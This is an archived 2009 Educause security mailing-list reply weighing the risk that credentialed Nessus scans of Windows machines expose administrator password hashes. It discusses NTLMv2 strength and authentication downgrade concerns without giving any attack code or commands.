Educause Security Discussion mailing list archives
Re: Checking for old web browsers and media plugins
From: Adam Carlson <ajcarlson () BERKELEY EDU>
Date: Wed, 18 Feb 2009 15:28:41 -0800
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Gary, That is a very good question with a somewhat complicated answer. The short answer is that in my opinion you are not introducing significant risk by running Nessus with credentials as long as the systems you scan are actually under your control. By default, Nessus uses NTLMv2 for authentication which is considered a "strong" hashing method. This is also used for a lot of non-Nessus Windows connections so most likely your NTLMv2 hashes are already flying around the network. Because NTLMv2 is hard to brute force, this is not a problem as long as your password is strong. Another concern would be that you scan a system that is not under your control and the system tries to force Nessus to use plaintext/lm authentication. On some nessus clients there is an easy way to prevent cleartext authentication, but I'm using an older client and I don't see that option (but there is supposed to be a way to do it from a script as well). As long as you control the systems being scanned you shouldn't have to worry about someone forcing a weak authentication method. As Curt mentioned, you have to weigh the above concerns against the risk of not being aware of unpatched software on your network. I personally am much more concerned about an end user navigating to a dangerous site with an outdated browser than I am someone gaining control of one of my systems or my network and then playing tricks on Nessus to get admin credentials. Chances are if someone has control of a system, they already have admin access and if someone has control of my network it would probably be easier to man-in-the-middle remote desktop. For more information on using Nessus with credentials, the Nessus folks have a pretty good discussion in this PDF: http://www.nessus.org/documentation/nessus_credential_checks.pdf Here is a discussion that occurred on insecure.org on the subject as well where people expressed similar concerns: http://seclists.org/dailydave/2005/q3/0291.html Here is a powerpoint that goes into way too much detail about cracking NTLMv2 but the final slide contains the conclusion that NTLMv2 is strong enough when a good password is chosen: http://www.blackhat.com/presentations/win-usa-02/urity-winsec02.ppt Gary Flynn wrote:
Adam Carlson wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Have you tried running Nessus scans with credentials against Windows systems? When Nessus can connect to the target system's registry and is provided administrator credentials,I did something similar for a while with the ISS scanner. Then I got nervous. What are the implications of this if the target desktop is running something like pwdump? Does it expose the Nessus administrative password hash?
- -- Adam Carlson Chief Security Officer Information Technology Residential and Student Service Programs Tel: 510-643-0631 Mobile: 510-220-2477 Email: ajcarlson () berkeley edu "Most of the things worth doing in the world had been declared impossible before they were done." ~Louis D. Brandeis -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkmcmagACgkQT0QSLt7kiaBNHQCgt+HYTc2NW3EF9pYcNYMlFP0t pRwAoLnXzrnB4pf3XKgVskzRDS1+Qrxk =kEsj -----END PGP SIGNATURE-----
Current thread:
- Checking for old web browsers and media plugins Bob Bayn (Feb 18)
- <Possible follow-ups>
- Re: Checking for old web browsers and media plugins Dean De Beer (Feb 18)
- Re: Checking for old web browsers and media plugins Gary Flynn (Feb 18)
- Re: Checking for old web browsers and media plugins Adam Carlson (Feb 18)
- Re: Checking for old web browsers and media plugins Gary Flynn (Feb 18)
- Re: Checking for old web browsers and media plugins Curt Wilson (Feb 18)
- Re: Checking for old web browsers and media plugins John Ladwig (Feb 18)
- Re: Checking for old web browsers and media plugins Curt Wilson (Feb 18)
- Re: Checking for old web browsers and media plugins Adam Carlson (Feb 18)
- Re: Checking for old web browsers and media plugins Bob Bayn (Feb 20)